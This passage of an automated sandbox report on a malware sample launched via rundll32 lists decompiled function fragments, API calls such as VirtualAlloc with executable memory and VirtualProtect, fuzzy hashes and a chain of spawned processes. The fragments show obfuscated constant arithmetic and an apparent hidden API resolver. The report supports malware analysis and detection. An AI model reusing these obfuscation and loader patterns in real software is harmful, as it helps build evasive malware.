0x00413d17
0x00413d27
0x00413d2a
0x00413d3d
0x00413d48
0x00413d4d

APIs

DeleteFileW.KERNELBASE(003455F6), ref: 00413D48

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5b1d029eb92624a6585f77e33b86a8f147f71a706021de730d0b46b31a3c72d2
Instruction ID: 50a829a984f6439f157760f031e1f078c86514079a47fd7f9c6ce93efa9fb157
Opcode Fuzzy Hash: 5b1d029eb92624a6585f77e33b86a8f147f71a706021de730d0b46b31a3c72d2
Instruction Fuzzy Hash: 8A11F571D00209EBDF04EFA4D94A89EBBB4FB44314F50C598E925A6261E7759B548F40

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD27, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0041CD27() {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _t48;

				_v20 = 0x9362;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0x3ac5;
				_v20 = _v20 ^ 0x0004a93d;
				_v16 = 0x2d14;
				_v16 = _v16 | 0xd3f48c41;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x069fac5e;
				_v12 = 0xc5b1;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0x469c37c1;
				_t48 = 0x70;
				_push(0xf9b1620b);
				_v12 = _v12 / _t48;
				_v12 = _v12 ^ 0x00a22cf4;
				_v8 = 0x5bb6;
				_v8 = _v8 >> 4;
				_v8 = _v8 | 0x6c69259f;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0000087c;
				_push(0xa43506f8);
				E004204D5(0x16b, _v12 % _t48);
				ExitProcess(0);
			}

0x0041cd2d
0x0041cd36
0x0041cd3a
0x0041cd41
0x0041cd48
0x0041cd4f
0x0041cd56
0x0041cd5a
0x0041cd61
0x0041cd68
0x0041cd6c
0x0041cd78
0x0041cd7b
0x0041cd80
0x0041cd86
0x0041cd92
0x0041cd99
0x0041cd9d
0x0041cda4
0x0041cda8
0x0041cdbb
0x0041cdc0
0x0041cdca

APIs

ExitProcess.KERNEL32(00000000), ref: 0041CDCA

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2e9f4816a751cc7b3e2e4233dde82b2bf974ba370e125a65ab7361591f6c0db6
Instruction ID: 9d6deadc2f9dac01a6146be8a7ab1eb9b80e7f69ff547992c2085b022c332ad9
Opcode Fuzzy Hash: 2e9f4816a751cc7b3e2e4233dde82b2bf974ba370e125a65ab7361591f6c0db6
Instruction Fuzzy Hash: D6112771E0060CFBEB48DFE8C84A59EBBB0FB00708F108599D526A7294C3B51B48DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00427C1D, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00427C1D(void* __ecx, void* __edx, void* _a4, short* _a8, int _a12, intOrPtr _a16) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t32;
				void* _t39;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				E004156B2(_t32);
				_v20 = 0xbc1d;
				_v20 = _v20 ^ 0x0dd364ac;
				_v20 = _v20 ^ 0x0dd3f88e;
				_v16 = 0x3616;
				_v16 = _v16 + 0xabd9;
				_v16 = _v16 ^ 0x0000ae6a;
				_v12 = 0xf8e2;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x000066c9;
				_v8 = 0x7efa;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x00001ae1;
				E004204D5(0x363, __edx, 0x7b24e105, 0x44ef1c65, __ecx, __edx, _a4);
				_t39 = OpenServiceW(_a4, _a8, _a12); // executed
				return _t39;
			}

0x00427c23
0x00427c26
0x00427c29
0x00427c31
0x00427c36
0x00427c40
0x00427c4c
0x00427c53
0x00427c5a
0x00427c61
0x00427c68
0x00427c6f
0x00427c73
0x00427c7a
0x00427c81
0x00427c85
0x00427ca5
0x00427cb6
0x00427cbb

APIs

OpenServiceW.SECHOST(000066C9,0000AE6A,0DD3F88E), ref: 00427CB6

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: e4bd333e93bea3d6457ccf8e61da761f4f4b9f5871f377a9978ba0890d7018f1
Instruction ID: b334dd57a4529a2a9ee610a1bd4132db629164c82bbcd1c454e893262804ed45
Opcode Fuzzy Hash: e4bd333e93bea3d6457ccf8e61da761f4f4b9f5871f377a9978ba0890d7018f1
Instruction Fuzzy Hash: BA112771D0020CFBDF45EFE4C80989EBBB4FB04318F008498F91566251D77A8B249F81

Uniqueness

Uniqueness Score: -1.00%

Function 0041D867, Relevance: 1.3, APIs: 1, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0041D867(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t32;
				int _t39;
				void* _t41;
				WCHAR* _t43;

				_push(_a16);
				_t43 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E004156B2(_t32);
				_v20 = 0xc112;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x00187660;
				_v16 = 0x44a2;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x44a20c46;
				_v8 = 0x80d5;
				_v8 = _v8 << 6;
				_v8 = _v8 << 9;
				_v8 = _v8 ^ 0x406aec0c;
				_v12 = 0x3c7d;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x000035cf;
				_push(0xf9b1620b);
				_push(0x903a0366);
				_t41 = 0x28;
				E004204D5(_t41, __edx);
				_t39 = lstrcmpiW(_a4, _t43); // executed
				return _t39;
			}

0x0041d86e
0x0041d871
0x0041d873
0x0041d876
0x0041d879
0x0041d87c
0x0041d87d
0x0041d87e
0x0041d883
0x0041d88d
0x0041d891
0x0041d898
0x0041d89f
0x0041d8a3
0x0041d8aa
0x0041d8b1
0x0041d8b5
0x0041d8b9
0x0041d8c0
0x0041d8c7
0x0041d8cb
0x0041d8de
0x0041d8e6
0x0041d8ed
0x0041d8ee
0x0041d8fa
0x0041d900

APIs

lstrcmpiW.KERNELBASE(000035CF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D8FA

Memory Dump Source

Source File: 00000008.00000002.2093577825.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000008.00000002.2093643430.0000000000431000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.2093654473.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 5112a81a2239dc82ca800b34fc2509730bf944e1d5fe2a59776ea9b54c5e6d15
Instruction ID: f826a495ce62a45dbfb5adbb8bc125be001f84b1a7f569a8b80af22021850ea9
Opcode Fuzzy Hash: 5112a81a2239dc82ca800b34fc2509730bf944e1d5fe2a59776ea9b54c5e6d15
Instruction Fuzzy Hash: F4112372C01218BBEF41EFE4C90A8DEBBB4FB00358F108498E92562251D7B98B24DF81

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00438330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 00438361
GetSystemMetrics.USER32(00000000), ref: 0043839D
GetSystemMetrics.USER32(00000001), ref: 004383A8

Strings

GetMonitorInfo, xrefs: 00438348
/}Au, xrefs: 0043839D, 004383A8
DISPLAY, xrefs: 004383C9

Memory Dump Source

Source File: 00000008.00000002.2093676667.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: 4131b143f35eef00fbacdab9590b21563ebd98cad3d0477150dd2569b284ccd2
Instruction ID: 6ae3c3431e0a0f4cdc9b09df252bdb408045dcfe36ad5bb39f7b412c6d358208
Opcode Fuzzy Hash: 4131b143f35eef00fbacdab9590b21563ebd98cad3d0477150dd2569b284ccd2
Instruction Fuzzy Hash: 3D11E1B16017059FD3208F209C44BA7F7E9EB09B10F01453EFD4AD7380DBB5A8888BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004385AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 004385E5
GetSystemMetrics.USER32(00000000), ref: 0043860A
GetSystemMetrics.USER32(00000001), ref: 00438615

Strings

EnumDisplayMonitors, xrefs: 004385C4
/}Au, xrefs: 0043860A, 00438615

Memory Dump Source

Source File: 00000008.00000002.2093676667.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: e2be4983ebd12d48cce4a90cbb448c6a2ea08e143c2634cf714a81f9f59210da
Instruction ID: 0ca048bcfe3694a12e1b1f7d9f96d1fa7bb67d705eef21a80d2edb2b16462a88
Opcode Fuzzy Hash: e2be4983ebd12d48cce4a90cbb448c6a2ea08e143c2634cf714a81f9f59210da
Instruction Fuzzy Hash: A63150B2901209AFDB01DFA5CC41AEFB7BCAF48304F01552BF915D3200EB38DA418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00438404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00438471
GetSystemMetrics.USER32(00000001), ref: 0043847C

Strings

DISPLAY, xrefs: 0043849D
/}Au, xrefs: 00438471, 0043847C
GetMonitorInfoA, xrefs: 0043841C

Memory Dump Source

Source File: 00000008.00000002.2093676667.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: 02b350f8d3d1495dbecc2dddd6d5c4a4fa81328eb3cb344016d6614a6830fc8c
Instruction ID: da24feb5e38c32448feb32b3003a274445e8e8f52c7837f53d428e63377e6ad2
Opcode Fuzzy Hash: 02b350f8d3d1495dbecc2dddd6d5c4a4fa81328eb3cb344016d6614a6830fc8c
Instruction Fuzzy Hash: 711106B16017069FD720DF609C44BA7F7E9EB19320F01493FFD598B640EB78A88487A9

Uniqueness

Uniqueness Score: -1.00%

Function 004384D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 00438545
GetSystemMetrics.USER32(00000001), ref: 00438550

Strings

/}Au, xrefs: 00438545, 00438550
DISPLAY, xrefs: 00438571
GetMonitorInfoW, xrefs: 004384F0

Memory Dump Source

Source File: 00000008.00000002.2093676667.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: 78462e94f7d740b16776c155514024d8479198731bd826b7bf80595dd752965b
Instruction ID: d2697804456ec8315f0ec931079aca8313af6e7e7ef8fb44397806324c22f84a
Opcode Fuzzy Hash: 78462e94f7d740b16776c155514024d8479198731bd826b7bf80595dd752965b
Instruction Fuzzy Hash: CD11E1B1A01705AFD720DF618C44BA7F7E9EB09310F05492FFD19C7240DB78A8848BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00438298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004382E6
GetSystemMetrics.USER32(00000001), ref: 004382F8

Strings

MonitorFromPoint, xrefs: 004382AA
/}Au, xrefs: 004382E6, 004382F8

Memory Dump Source

Source File: 00000008.00000002.2093676667.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: 242c5e28f5363545f22d7731d7253973bb46cd2285502f112e52679fe82f2f70
Instruction ID: 1cc1f1071fc2d50d00d2dc73532995e128b0d6c6102d72282368babe0669397d
Opcode Fuzzy Hash: 242c5e28f5363545f22d7731d7253973bb46cd2285502f112e52679fe82f2f70
Instruction Fuzzy Hash: 4A01A2B1201709AFDB005F51DC44B9EFB56EB48B54F05503EFE198B351CB76AC858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00438170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004381C1
GetSystemMetrics.USER32(00000001), ref: 004381CD

Strings

MonitorFromRect, xrefs: 00438185
/}Au, xrefs: 004381C1, 004381CD

Memory Dump Source

Source File: 00000008.00000002.2093676667.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: b7c59f5e9a28591805704d8eb5efe956add44f9d93f24166d3243eba57d13ae0
Instruction ID: 193a60a69ac6db6e0e2c57acc0a3772f009d2559bd06e820007d127a1c22a2b2
Opcode Fuzzy Hash: b7c59f5e9a28591805704d8eb5efe956add44f9d93f24166d3243eba57d13ae0
Instruction Fuzzy Hash: AC018F312003149BDB109B04DC85B67F796E748395F06906FFD08CA242CA799C8A8BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00472B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00472B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00472BA9
DdeGetLastError.USER32(00000015), ref: 00472BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 00472BCD

Memory Dump Source

Source File: 00000008.00000002.2093676667.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_434000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: c2238b1e27b94fe61dc4be4caeacbeb57bfca1eb7569e6f8106d52b6c5dad098
Instruction ID: 765300d3f5e3bbff5fb2c2544ef87909bbd735a4662d33ecf9462ffa88e72a4d
Opcode Fuzzy Hash: c2238b1e27b94fe61dc4be4caeacbeb57bfca1eb7569e6f8106d52b6c5dad098
Instruction Fuzzy Hash: 552138B42042409FDB40DF69C9C1F9A77E8AB49310F15C196F948CF2A6D679E880CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00471428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 004714BF

Strings

`, xrefs: 00471498
0G, xrefs: 00471607

Memory Dump Source

Source File: 00000008.00000002.2093676667.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_434000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 0G$`
API String ID: 701148680-3241260100
Opcode ID: 9e02d66339d7ddf8b573539b21d55ed548c50e9bf90fbc62443992b6d6763949
Instruction ID: 318bdb09d630f8d802be214e4d4d1a87daecc8ad5ae4e503b2883369cae3f062
Opcode Fuzzy Hash: 9e02d66339d7ddf8b573539b21d55ed548c50e9bf90fbc62443992b6d6763949
Instruction Fuzzy Hash: 80516376A002199BCB14DE6DDA854EF73B9AB48354F15C026FD0EE7360CA38DD06C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 004380E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 00438110

Strings

GetSystemMetrics, xrefs: 004380F8
/}Au, xrefs: 004380FD, 0043810A, 00438110

Memory Dump Source

Source File: 00000008.00000002.2093676667.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_434000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: 64d931bea9c76e4fe3123310add8274005917f582cae50c34d6ff221ed16196a
Instruction ID: a180f6a806744f77f9d2f12b9412a4c86aec5cbc8f49c144a73a20ca680ee0d1
Opcode Fuzzy Hash: 64d931bea9c76e4fe3123310add8274005917f582cae50c34d6ff221ed16196a
Instruction Fuzzy Hash: EEF0F0701017004ACF145F388E80A67F566A74E334F75AA3FF129472D2CE7C8987964E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2920 Parent PID: 2796 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	867
Total number of Limit Nodes:	1

Executed Functions

Function 001A0540, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001A058F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 001A07D9

Memory Dump Source

Source File: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: cbb60a0c1dc38060a52564954c136f5f23e57098a1ee72d03218a617e23310eb
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 2DC1A8B9A002099FCB49CF98C590EAEB7B5BF8C304F148159E959AB351D735EE42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001A0020, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001A00A4

Strings

VirtualAlloc, xrefs: 001A0089, 001A008C

Memory Dump Source

Source File: 00000009.00000002.2095115818.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_180000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: 5ced815e21c810353912b9ac97dac951592ef486d4b6b195dfe609eceafc30b8
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 78113060D08289EAEF01D7E894097FEBFB55B25704F044098E6446A282D3BA575887A6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2936 Parent PID: 2920 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	870
Total number of Limit Nodes:	1

Executed Functions

Function 003C0540, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 003C058F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 003C07D9

Memory Dump Source

Source File: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3a0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: bc53691aaa2f8d45291162461c333bb65061554793389c6dde92631b0626d8cb
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 50C196B5A00209DFCB49CF98C590EAEB7B5BF88304F248159E919AB351D735EE52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 003C0020, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 003C00A4

Strings

VirtualAlloc, xrefs: 003C0089, 003C008C

Memory Dump Source

Source File: 0000000A.00000002.2098058880.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3a0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: 6da1f6b5993e97362553f30a86935ed8fc5b87eb26c45cb684ed1cc892dbacde
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: C3113060D082C9DEEF01D7E8D809BFFBFB55B11708F044098D6446A282D2BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 3044 Parent PID: 2936 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	871
Total number of Limit Nodes:	1

Executed Functions

Function 003F0540, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 003F058F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 003F07D9

Memory Dump Source

Source File: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: 40f41befc8888fd3bf8f03fa5aa025cbe872b25d5ece954d92ea681e7f1ecef6
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 15C1A875A00209DFCB48CF98C590EAEB7B5FF88304F248159E919AB356D735EA42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 003F0020, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 003F00A4

Strings

VirtualAlloc, xrefs: 003F0089, 003F008C

Memory Dump Source

Source File: 0000000B.00000002.2099763419.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: de42a056911e3adaed63ab84570f608af0a761d0634cd15845c4abca757398dc
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: A811D060D082CDDEEF02D7E9D8097FFBFB55B11704F044098D6446A282D6FA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2468 Parent PID: 3044 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	866
Total number of Limit Nodes:	1

Executed Functions

Function 00210540, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0021058F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 002107D9

Memory Dump Source

Source File: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: 2b425c14af253359483b2701cc87d8de734f2e68349d05c7b42118f3ea79d9db
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 49C1B974A10209DFCB48CF88C590EAEB7B5BF98304F248159E919AB341D775EE92CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00210020, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 002100A4

Strings

VirtualAlloc, xrefs: 00210089, 0021008C

Memory Dump Source

Source File: 0000000C.00000002.2100869950.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: d33619e5a16955bba27f44786be80c4cc783919c6d742044480f5aa5fdc158cf
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 00110060D08289DAEF01D7E894497FEBFB55B21704F044098E6446A282D6FA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2448 Parent PID: 2468 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	15.1%
Signature Coverage:	0%
Total number of Nodes:	73
Total number of Limit Nodes:	5

Executed Functions

Function 006C3928, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 136
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnhMetaFileA.GDI32(trty55345), ref: 006C39C2
VirtualAlloc.KERNELBASE(00000000,006C6CB4,00001000,00000040), ref: 006C3A8E

Strings

|ll, xrefs: 006C3961
trty55345, xrefs: 006C39BD

Memory Dump Source

Source File: 0000000D.00000002.2102981385.0000000000684000.00000020.00020000.sdmp, Offset: 00684000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_684000_rundll32.jbxd

Similarity

API ID: AllocFileMetaVirtual
String ID: trty55345$|ll
API String ID: 2643768156-3224532315
Opcode ID: b21766a41c80a247a19a621050b47ad738dfd8617d156bc609d0921665fc83a0
Instruction ID: 0296351f30fbd724fb769463a47ebe7c5bd9be54dfafc2b8715438f6860067f4
Opcode Fuzzy Hash: b21766a41c80a247a19a621050b47ad738dfd8617d156bc609d0921665fc83a0
